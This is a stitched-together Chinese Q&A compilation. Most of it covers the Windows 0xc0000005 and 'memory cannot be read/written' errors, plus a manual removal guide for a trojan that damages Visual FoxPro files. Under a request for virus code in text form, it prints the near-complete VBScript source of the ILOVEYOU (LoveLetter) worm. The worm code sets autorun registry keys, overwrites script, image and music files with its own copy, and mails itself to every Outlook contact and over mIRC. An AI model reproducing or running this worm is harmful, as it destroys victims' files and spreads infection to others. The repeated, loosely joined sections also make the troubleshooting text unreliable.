应用程序失败
应用程序正常初始化(0xc0000005)失败
说明文字:PAGE-FAULT-IN-NONPAGED-AREA
通常的原因:内存错误(数据不能使用分页文件交换到磁盘中).
解决方法:卸掉所有的新近安装的硬件.
运行由计算机制造商提供的所有系统诊断软件.尤其是内存检查.
检查是否正确安装了所有新硬件或软件,如果这是一次全新安装,请与硬件或软件制造商联系,获得可能需要的任何Windows更新或驱动程序.
禁用或卸载所有的反病毒程序.
禁用BIOS内存选项,例如cache或shadow.
应用程序初始化内存分配错误。
0xc0000005错误发生的诱因主要分为四大类:
1、自由表存储载体的缺陷(主要体现在VCX、VCT,SCX和SCT上)。
2、第三方监控性质的软件。(如:防毒软件在内存即时监控状态下、词霸软件在全屏拾取模式下等);
3、VisualFoxpro自身的代码漏洞;
4、硬件因素。
建议断开网络,然后关闭防火墙,再安装试试,如果不行,重启电脑再试,再不行则归类为程序缺陷了。
存不能为“read”或“written”的解决方案
有些人运行飚车程序的时候会弹出该内存不能为“read”的错误提示。希望以下文章能对大家有所帮助。
使用Windows操作系统的人有时会遇到这样的错误信息,运行某些程序的时候,有时会出现内存错误的提示,然后该程序会自动关闭或点击后关闭,严重的会无法关闭。
“0x????????”指令引用的“0x????????”内存。该内存不能为“read”。
“0x????????”指令引用的“0x????????”内存,该内存不能为“written”。
不知你出现过类似这样的故障吗?(0x后面内容有可能不一样。)
散一般出现这个现象有方面的,一是硬件,即内存方面有问题,二是软件,这就有多方面的问题了。
1、微软IE缓冲溢出漏洞引起
2、内存或虚拟内存地址使用冲突造成程序的运行需要分配一定的内存地址给程序使用,当程序结束时释放留出空间让给新的程序使用,win是多任务的系统有时前程序未结束
又有新的任务开始到底要多少内存或虚拟内存来保证我们同时运行的工作任务呢?也许win在这个问题上没弄好,所以有此错误常常发生,一般运行大型软件或多媒体后出现这种情况
3、劣质内存条也会出现这个问题一般来说,内存出现问题的可能性并不大,主要方面是:内存条坏了、内存质量有问题,还有就是2个不同牌子不同容量的内存混插,也比较容易出现不兼容的情况,同时还要注意散热问题,特别是超频后。你可以使用MemTest这个软件来检测一下内存,它可以彻底的检测出内存的稳定度。假如你是双内存,而且是不同品牌的内存条混插或者买了二手内存时,出现这个问题,这时,你就要检查是不是内存出问题了或者和其它硬件不兼容。
4、微软WINDOWS系统的漏洞,windows把内存地址0X00000000到0X0000ffff指定为分配null指针的地址范围,如果程序试图访问这一地址,则认为是错误。c/c++编写的程序通常不进行严格的错误检查,当采用malloc来分配内存而可供分配的地址空间不够的情况下返回null指针。但是代码不检查这种错误,认为地址分配已经成功,于是就访问0X00000000的地址,于是就发生内存违规访问,同时该进程被终止。ASCII字符填充组成的pif文件时会出现以下情况:一个非法的pif文件(用ascii字符\''x\''填充)至少要369字节,系统才认为是一个合法的pif文件,才会以pif的图标[pifmgr.dll,0]显示,才会在属性里有程序、字体、内存、屏幕”等内容。而且仅仅当一个非pif文件的大小是369字节时察看属性的“程序”页时,不会发生程序错误,哪怕是370字节也不行。当对一个大于369字节的非法pif文件察看属性的“程序”页时,Explorer会出错,提示:\''***\''指令引用的\''***\''内存。该内存不能为\''read\''
,问题出在pif文件的16进制地址:0x00000181[0x87]0x00000182[0x01]和
0x00000231[0xC3]0x00000232[0x02]即使是一个合法pif文件,只要改动这四处的任意一处,也会引起程序错误。而只要把0x00000181和0x00000182的值改为[0xFF][0xFF],那么其它地址任意更改都不会引起错误。
5、可能没有完全正确安装apache服务,且启动了它的原故; 把服务中OracleOraHomeXXHTTPServer改成停 止
6、应用程序没有检查内存分配失败程序需要一块内存用以保存数据时,就需要调用操作系统提供的“功能函数”来申请,如果内存分配成功,函数就会将所新开辟的内存区地址返回给应用程序,应用程序就可以通过这个地址使用这块内存。这就是“动态内存分配”,内存地址也就是编程中的“指针”。内存不是永远都招之即来、用之不尽的,有时候内存分配也会失败。当分配失败时系统函数会返回一个0值,这时返回值“0”已不表示新启用的指针,而是系统向应用程序发出的一个通知,告知出现了错误。作为应用程序,在每一次申请内存后都应该检查返回值是否为0,如果是,则意味着出现了故障,应该采取一些措施挽救,这就增强了程序的“健壮性”。若应用程序没有检查这个错误,它就会按照“思维惯性”认为这个值是给它分配的可用指针,继续在之后的运行中使用这块内存。真正的0地址内存区保存的是计算机系统中最重要的“中断描述符表”,绝对不允许应用程序使用。在没有保护机制的操作系统下(如DOS),写数据到这个地址会导致立即死机,而在健壮的操作系统中,如Windows等,这个操作会马上被系统的保护机制捕获,其结果就是由操作系统强行关闭出错的应用程序,以防止其错误扩大。这时候,就会出现上述的“写内存”错误,并指出被引用的内存地址为“0x00000000”。内存分配失败故障的原因很多,内存不够、系统函数的版本不匹配等都可能有影响。因此,这种分配失败多见于操作系统使用很长时间后,安装了多种应用程序(包括无意中“安装”的病毒程序),更改了大量的系统参数和系统文件之后。
7、应用程序由于自身BUG引用了不正常的内存指针在使用动态分配的应用程序中,有时会有这样的情况出现:程序试图读写一块“应该可用”的内存,但不知为什么,这个预料中可用的指针已经失效了。有可能是“忘记了”向操作系统要求分配,也可能是程序自己在某个时候已经注销了这块内存而“没有留意”等等。注销了的内存被系统回收,其访问权已经不属于该应用程序,因此读写操作也同样会触发系统的保护机制,企图“违法”的程序唯一的下场就是被操作终止运行,回收全部资源。计算机世界的法律还是要比人类有效和严厉得多啊!像这样的情况都属于程序自身的BUG,你往往可在特定的操作顺序下重现错误。无效指针不一定总是0,因此错误提示中的内存地址也不一定为“0x00000000”,而是其他随机数字。
如果系统经常有所提到的错误提示,下面的建议可能会有帮助:
1.查看系统中是否有木马或病毒。这类程序为了控制系统往往不负责任地修改系统,从而导致操作系统异常。平常应加强信息安全意识,对来源不明的可执行程序绝不好奇。
2.更新操作系统,让操作系统的安装程序重新拷贝正确版本的系统文件、修正系统参数。有时候操作系统本身也会有BUG,要注意安装官方发行的升级程序。
3.试用新版本的应用程序。
4、删除然后重新创建 WINDOWS\Wbem\Repository
文件夹中的文件:在桌面上右击我的电脑,然后单击管理。在"服务和应用程序"下,单击服务,然后关闭并停止 Windows Management
Instrumentation 服务。删除 WINDOWS\System32\Wbem\Repository
文件夹中的所有文件。(在删除前请创建这些文件的备份副本。) 打开"服务和应用程序",单击服务,然后打开并启动 Windows Management
Instrumentation 服务。当服务重新启动时,将基于以下注册表项中所提供的信息重新创建这些文件:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Autorecover MOFs
下面我从几个例子给大家分析:
例一:打开IE浏览器或者没过几分钟就会出现"0x70dcf39f"指令引用的"0x00000000"内存。该内存不能为“read”。要终止程序,请单击“确定”的信息框,单击“确定”后,又出现“发生内部错误,您正在使用的其中一个窗口即将关闭”的信息框,关闭该提示信息后,IE浏览器也被关闭。
解决方法:修复或升级IE浏览器,同时打上补丁。看过其中一个修复方法是,Win2000自升级,也就是Win2000升级到Win2000,其实这种方法也就是把系统还原到系统初始的状态下。比如你的IE升级到了6.0,自升级后,会被IE5.0代替。
例二:在windowsxp下双击光盘里面的“AutoRun.exe”文件,显示“0x77f745cc”指令引用的0x00000078”内存。该内存不能为“written”,要终止程序,请单击“确定”,而在Windows
98里运行却正常。
解决方法:这可能是系统的兼容性问题,winXP的系统,右键“AutoRun.exe”文件,属性,兼容性,把“用兼容模式运行这个程序”项选择上,并选择“Windows
98/Me”。win2000如果打了SP的补丁后,只要开始,运行,输入:regsvr32
c:\winnt\apppatch\slayerui.dll。右键,属性,也会出现兼容性的选项。
例三:RealOne
Gold关闭时出现错误,以前一直使用正常,最近却在每次关闭时出现“0xffffffff”指令引用的“0xffffffff”内存。该内存不能为“read”
的提示。
解决方法:当使用的输入法为微软拼音输入法2003,并且隐藏语言栏时(不隐藏时没问题)关闭RealOne就会出现这个问题,因此在关闭RealOne之前可以显示语言栏或者将任意其他输入法作为当前输入法来解决这个问题。
例四:我的豪杰超级解霸自从上网后就不能播放了,每次都提示“0x060692f6”(每次变化)指令引用的“0xff000011”内存不能为“read”,终止程序请按确定。
解决方法:试试重装豪杰超级解霸,如果重装后还会,到官方网站下载相应版本的补丁试试。还不行,只好换就用别的播放器试试了。
例五:双击一个游戏的快捷方式,“0x77f5cd0”指令引用“0xffffffff”内存,该内存不能为“read”
,并且提示Client.dat程序错误。
解决方法:重装显卡的最新驱动程序,然后下载并且安装DirectX9.0。
例六:一个朋友发信息过来,我的电脑便出现了错误信息:“0x772b548f”指令引用的“0x00303033”内存,该内存不能为“written”,然后QQ自动下线,而再打开QQ,发现了他发过来的十几条的信息。
解决方法:这是对方利用QQ的BUG,发送特殊的代码,做QQ出错,只要打上补丁或升级到最新版本,就没事了。
例七:我的笔记本电脑用的XP系统,有时关闭网页时会弹出tbrowser.exe遇到问题需要关闭,然后有弹出0x03e7c738指令引用的0x03e7c738内存,该内存不能为read,请问是怎么回事?
解决方法:先查杀一下病毒,另外如果你安装了浏览增强之类的软件,请卸掉。
例八:从桌面或开始菜单中打开任何一个程序,
出现错误提示:"0x........"指令引用的"0x00000000"内存,该内存不能为"read"。省略号代表可变值。而从运行中打开程序没问题。
解决方法:运行regedit进入注册表,
在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks下,应该只有一个正常的键值"{AEB6717E-7E19-11d0-97EE-00C04FD91972},
将其他的删除(默认键值当然不要删除)。
例九:我三个月前配了台机子。系统比较不稳定,三个月内已经重装过多次系统,四五天前刚装过系统,可是经常随机地出现Explorer-应用程序错误,“0x4a01259d“指令引用的“0x00000000"内存。该内存不能为“read"。要终止程序,请单击“确定“。要调试程序,请单击“取消”。如果点确定,windows桌面就不见了。这种问题在之前的系统也出现过,不知道是不是硬件的问题?
解决方法:内存的兼容性问题!遇到这类问题,用户可以自行打开机器把内存的位置调动一下,看问题是否可以解决,如果问题依旧,可与你的朋友调换内存使用。
通过上面的几个例子,可以看到,出现故障的原因有好多种,下面列出已经提到和有可能发生的原因,方便查阅。
问题产生原因原因--解决方法
内存条坏了--更换内存条
双内存不兼容--使用同品牌的内存或只用一条内存
内存质量问题--更换内存条
散热问题--加强机箱内部的散热
内存和主板没插好或和其它硬件不兼容等--重插内存或换个插糟
硬盘有问题--更换硬盘
驱动问题--重装驱动。如果是新系统,要先安装主板驱动
软件损坏--重装软件
软件有BUG--打补丁或用最新的版本。
软件和系统不兼容--给软件打上补丁或者试试系统的兼容模式
软件和软件之间有冲突--如果最近安装了什么新软件,卸载了试试
软件要使用到其它相关的软件有问题--重装相关软件。比如播放某一格式的文件时出错,可能是这个文件的解码器有问题
病毒问题--杀毒
杀毒软件与系统或软件冲突--由于杀毒软件是进入底层监控系统的,可能与一些软件冲突,卸载了试试
系统本身有问题--有时候操作系统本身也会有BUG,要注意安装官方发行的升级程序,像SP的补丁,最好要打上。如果还不行重装系统或更换其它版本的系统了。
〔又一说〕
在控制面板的添加/删除程序中看看你是否安装了微软NET.Framework,如果已经安装了,可以考虑卸载它,当然如果你以后在其它程序需要NET.Framework时候,可以再重新安装。
另外,如果你用的是ATI显卡并且你用的是SP2的补丁(一些ATI的显卡驱动需要在NET.Framework正常工作的环境下)。这种情况你可以找一款不需要NET.Framework支持的ATI显卡驱动。
如果以上两种方法并不能完全解决问题,你试着用一下“IE修复”软件,并可以查查是否有病毒之类的。
〔微软NET.Framework升级到1.1版应该没问题了〕
〔还有一说〕
方法一:
微软新闻组的朋友指点:开始--运行:regsvr32 jscript.dll
开始--运行:regsvr32 vbscript.dll
不过没解决---但提供了路子-----一次运行注册所有dll
搜索查找到方法如下:
运行 输入cmd
回车在命令提示符下输入
for %1 in (%windir%\system32\*.dll) do regsvr32.exe /s %1
这个命令老兄你慢慢输 输入正确的话会看到飞快地滚屏 否则……否则失败就是没这效果。回车后慢慢等(需要点时间1-2分钟) 都运行完再打开看
方法二:
这是个典型问题~~~~~引起这个问题的原因很多。一般来讲就是给系统打上补丁和更换内存、给内存换个插槽这3种方法来解决。[系统补丁只要到Microsoft
Update网站在线更新就可以了]
你好。蓝婼琯
恩嗯,差不多就是如此。该说的都说了
电脑中什么毒了怎么杀
..................金山毒霸已经被病毒感染了,你把金山毒霸卸载掉。然后使用 360系统修复就可以了。
中了病毒文件杀手的症状有哪些啊``
病毒文件杀手是新病毒吗?
病毒自动感染可移动磁盘的每一个目录,复制一个文件名为:"Project.pjx.exe"的文件到每一个目录下,该文件执行后将释放几个文件到系统中:
cmd.exe -〉该文件覆盖系统的CMD.EXE,运行后只简单显示一个字符串:“C:\”,迷惑用户
cmd.lnd.dll -〉该文件是文件:"Project.pjx.exe"的副本
iexplorex.dll -〉这是病毒的主要功能模块,将以组件方式运行,进行破坏活动。
该病毒:
隐藏自己,遍历所有驱动器,当发现该驱动器为可移动设备时将在该驱动器的所有目录下复制病毒的副本。
检查当前系统日期是否为周六或周日,时间大于13:00,成立则进行破坏活动;
该病毒主要破坏Visual Fox Pro的相关文件如:“*.SCT、*.pjx、.*.prg、*.dbf、*.doc”等,将该文件填充空格。
金山毒霸信息安全网站
这是一个破坏Visual FoxPro文件的木马病毒。该病毒会遍历所有驱动器,如果当前驱动器是可移动磁盘,病毒就会将自己拷贝为Project.pjx.exe到该驱动器的所有目录下(包括子目录)。该病毒运行的时候会检测当前系统时间是否为周六或周日并且是13:00以后,如果条件成立,该病毒就会破坏Visual FoxPro的相关文件(如:.SCT、.pjx、.prg、.dbf、.doc等),将这些文件填为空格。此外,该病毒还会修改IE浏览器的某些设置,使得用户在使用IE浏览器的时候会出现一些错误。
1)病毒复制一个文件名为“Project.pjx.exe”的文件到可移动磁盘的每一个目录下,该文件执行后会释放以下3个文件:
%SystemRoot%\cmd.lnd (病毒副本)
%SystemRoot%\iexplorex.dll (病毒Win32.Troj.HavedoDll.a)
%System%\cmd.exe (该文件是病毒释放的,系统的cmd.exe已经被它覆盖。该cmd.exe运行时只简单显示一个字符串“C:\”来迷惑用户)
2)修改IE浏览器的某些设置:
HKEY_CLASSES_ROOT\CLSID\{37125E31-AD55-4F7B-BF6F-A17A20953945}\(Default)=""
HKEY_CLASSES_ROOT\CLSID\{37125E31-AD55-4F7B-BF6F-A17A20953945}\InprocServer32\(Default)="%SystemRoot%\iexplorex.dll"
HKEY_CLASSES_ROOT\CLSID\{37125E31-AD55-4F7B-BF6F-A17A20953945}\InprocServer32\ThreadingModel="Apartment"
HKEY_CLASSES_ROOT\iexplorex.IEHelper\(Default)=""
HKEY_CLASSES_ROOT\iexplorex.IEHelper\Clsid\(Default)="{37125E31-AD55-4F7B-BF6F-A17A20953945}"
HKEY_CLASSES_ROOT\CLSID\{37125E31-AD55-4F7B-BF6F-A17A20953945}\ProgID\(Default)="iexplorex.IEHelper"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue=0x0
由此可见,该病毒会破坏.doc文件,这可是非常重要的!(我已经被破坏了一个文档了)而且打开“我的电脑-菜单-工具-文件夹选项-查看”中“隐藏文件和文件夹”这里,始终会设置为“不显示隐藏的文件和文件夹”,即使修改为“显示所有文件和文件夹”后,仍然会自己改回来,这样,具有隐藏属性的文件(包括病毒等)将不会被显示,这给排除病毒带来了很大的麻烦,而且我们设为隐藏属性的文件则再也看不到了。
下面我说说我通过手工排除这个病毒的步骤,虽然不是最完美的,起码上面的问题已经成功的解决掉了,第一时间先发出来给大家看看,希望能帮上大家的忙,也希望有朋友加以指正。
1、首先,这个病毒会附在explorer.exe和iexplore.exe中启动,但在进程列表中看不见,所以,先改注册表。我没有按照上面注册表项一个个修改,因为我在改之前还没看到这些病毒报告呢!只要搜索“iexplorex”项,将找到的项删除即可,共有两项。
2、删除iexplorex.dll文件。直接删除是不行的,因为它正在运行中。在“运行”中输入“cmd”打开命令提示符,运行“tasklist /M 1.txt”,将目前所运行的进程及关联模块文件列出并输出到1.txt文件中,因为内容很多,屏幕会显示不够长。打开1.txt文件,搜索“iexplorex”文本,找到它出现的位置,其所属进程一般为explorer和iexplore,打开任务管理器,将这两个进程卸掉,然后删除iexplorex.dll文件,再启动explorer.exe。如果出现上面说的假提示符,则说明cmd.exe文件已被修改,可将xp安装光盘插入,运行“sfc /scannow”程序来恢复被修改的文件,然后启动命令提示窗口,步骤同上。也可以用xp安装光盘启动,进入恢复模式,手动恢复cmd.exe文件,然后删除iexplorex.dll文件。
3、修改隐藏文件显示设置。打开注册表,找到“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden”选项,将“SHOWALL\CheckedValue”的值改为1,确认“DefaultValue”为2。在“NoHidden”项下对应的这两个值为2,2。然后打开“我的电脑”检查“显示所有文件和文件夹”是否可以选中并保持。
4、选择“显示所有文件和文件夹”选项后,搜索硬盘和移动存储器中有没有上面列出的“project.pjx.exe”和“cmd.lnd.dll”文件,找到并删除。至此病毒排除完成!
还有最好安装一些象卡巴之类的杀毒软件和防火墙。
怎样辨别木马
辨别木马方法
1、安装腾讯电脑管家、诺顿等一款能拦截及查杀木马的杀毒软件,
2、使用腾讯电脑管家病毒查杀功能全盘扫描电脑,能辨别电脑中有无木马。
3、打开任务管理器,查看有无异常程序,木马通常会将自身程序伪装成和系统程序相似的程序,如将系统程序是O,而木马则伪装成0
4、文件的路径如果在“C:WINDOWSsystem32”目录外,那么就可以判定是病毒了。
谁有木马或病毒代码 用那种文本文档的
你可以看看这个:
:)
rem barok -loveletter(vbe) i hate go to school
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group
/ Manila,Philippines
On Error Resume Next
dim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
Scripting Host\\Settings\\Timeout")
if (rr=1) then -设置超时
wscr.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
Scripting Host\\Settings\\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem"\\MSKernel32.vbs") -复制文件
c.Copy(dirwin"\\Win32DLL.vbs") -复制文件
c.Copy(dirsystem"\\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MSKernel32",dirsystem"\\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\Win32DLL",dirwin"\\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet
Explorer\\Download Directory")
if (downread="") then
downread="c:\\"
end if
if (fileexist(dirsystem"\\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
elseif num = 2 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
elseif num = 3 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
elseif num = 4 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
end if
end if
if (fileexist(downread"\\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WIN-BUGSFIX",downread"\\WIN-BUGSFIX.exe"
regcreate
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet
Explorer\\Main\\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path"\\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or
(ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec"\\"bname".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or
(s="mirc.ini") or (s="script.ini") or (s="mirc.hlp")
then
set
scriptini=fso.CreateTextFile(folderspec"\\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script...
mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect
and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine "; "
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt
}"
scriptini.WriteLine "n2= /.dcc send $nick
"dirsystem"\\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim
x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf"kindly check the attached
LOVELETTER coming from me."
male.Attachments.Add(dirsystem"\\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="HTMLHEADTITLELOVELETTER -
HTML?-?TITLEMETA NAME=@- @ Generator@- @
CONTENT=@- @BAROK VBS - LOVELETTER@- @"vbcrlf _
"META NAME=@- @ Author@- @ CONTENT=@- @spyder ?-?
ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila,
Philippines ?-? March 2000@- @"vbcrlf _
"META NAME=@- @ Description@- @ CONTENT=@- @simple but i
think this is good...@- @"vbcrlf _
"?-?HEADBODY
onmouseOUT=@- @window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
"vbcrlf _
" ONKEYDOWN=@- @window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
BGPROPERTIES=@- @ fixed@- @
BGCOLOR=@- @ #FF9933@- @"vbcrlf _
"CENTERpThis HTML file need ActiveX
Control?-?ppTo Enable to read this HTML fileBR-
Please press #-#YES#-# button to Enable
ActiveX?-?p"vbcrlf _
"?-?CENTERMARQUEE LOOP=@- @ infinite@- @
BGCOLOR=@- @ yellow@- @----------z--------------------z----------?-?MARQUEE
"vbcrlf _
"?-?BODY?-?HTML"vbcrlf _
"SCRIPT language=@- @ JScript@- @"vbcrlf _
"!--?-??-?"vbcrlf _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"vbcrlf
_
"?-??-?--"vbcrlf _
"?-?SCRIPT"vbcrlf _
"SCRIPT LANGUAGE=@- @ VBScript@- @"vbcrlf _
"!--"vbcrlf _
"on error resume next"vbcrlf _
"dim
fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"vbcrlf
_
"aw=1"vbcrlf _
"code="
dta2="set
fso=CreateObject(@-@ Scripting.FileSystemObject@- @)"vbcrlf
_
"set dirsystem=fso.GetSpecialFolder(1)"vbcrlf _
"code2=replace(code,chr(91)chr(45)chr(91),chr(39))"vbcrlf
_
"code3=replace(code2,chr(93)chr(45)chr(93),chr(34))"vbcrlf
_
"code4=replace(code3,chr(37)chr(45)chr(37),chr(92))"vbcrlf
_
"set
wri=fso.CreateTextFile(dirs dirsystem@- @ ^-^MSKernel32.vbs@- @)"vbcrlf
_
"wri.write code4"vbcrlf _
"wri.close"vbcrlf _
"if
(fso.FileExists(dirs dirsystem@- @ ^-^MSKernel32.vbs@- @))
then"vbcrlf _
"if (err.number=424) then"vbcrlf _
"aw=0"vbcrlf _
"end if"vbcrlf _
"if (aw=1) then"vbcrlf _
"document.write @-@ERROR: can#-#t initialize
ActiveX@- @"vbcrlf _
"window.close"vbcrlf _
"end if"vbcrlf _
"end if"vbcrlf _
"Set regedit =
CreateObject(@-@ WScript.Shell@- @)"vbcrlf _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Soft ware^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@- @,dirs dirsystem@- @ ^-^MSKernel32.vbs@- @"vbcrlf
_
"?-??-?--"vbcrlf _
"?-?SCRIPT"
dt1=replace(dta1,chr(35)chr(45)chr(35),"\'")
dt1=replace(dt1,chr(64)chr(45)chr(64),"""")
dt4=replace(dt1,chr(63)chr(45)chr(63),"/")
dt5=replace(dt4,chr(94)chr(45)chr(94),"\\")
dt2=replace(dta2,chr(35)chr(45)chr(35),"\'")
dt2=replace(dt2,chr(64)chr(45)chr(64),"""")
dt3=replace(dt2,chr(63)chr(45)chr(63),"/")
dt6=replace(dt3,chr(94)chr(45)chr(94),"\\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"\'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)"vbcrlf _"
end if
next
set
b=fso.CreateTextFile(dirsystem+"\\LOVE-LETTER-FOR-YOU.HTM")
b.close
set
d=fso.OpenTextFile(dirsystem+"\\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
无主之地错误
应用程序初始化内存分配错误。
0xc0000005错误发生的诱因主要分为四大类:
1、自由表存储载体的缺陷(主要体现在VCX、VCT,SCX和SCT上)。
2、第三方监控性质的软件。(如:防毒软件在内存即时监控状态下、词霸软件在全屏拾取模式下等);
3、VisualFoxpro自身的代码漏洞;
4、硬件因素。
建议断开网络,然后关闭防火墙,再安装试试,如果不行,重启电脑再试,再不行则归类为程序缺陷了。
1、 检查系统中是否有木马或病毒。这类程序为了控制系统往往不负责任地修改系统,从而导致操作系统异常。平常应加强信息安全意识,对来源不明的可执行程序绝不好奇。
2、 更新操作系统,让操作系统的安装程序重新拷贝正确版本的系统档案、修正系统参数。有时候操作系统本身也会有BUG,要注意安装官方发行的升级程序。
3、 尽量使用最新正式版本的应用程序、Beta版、试用版都会有BUG。
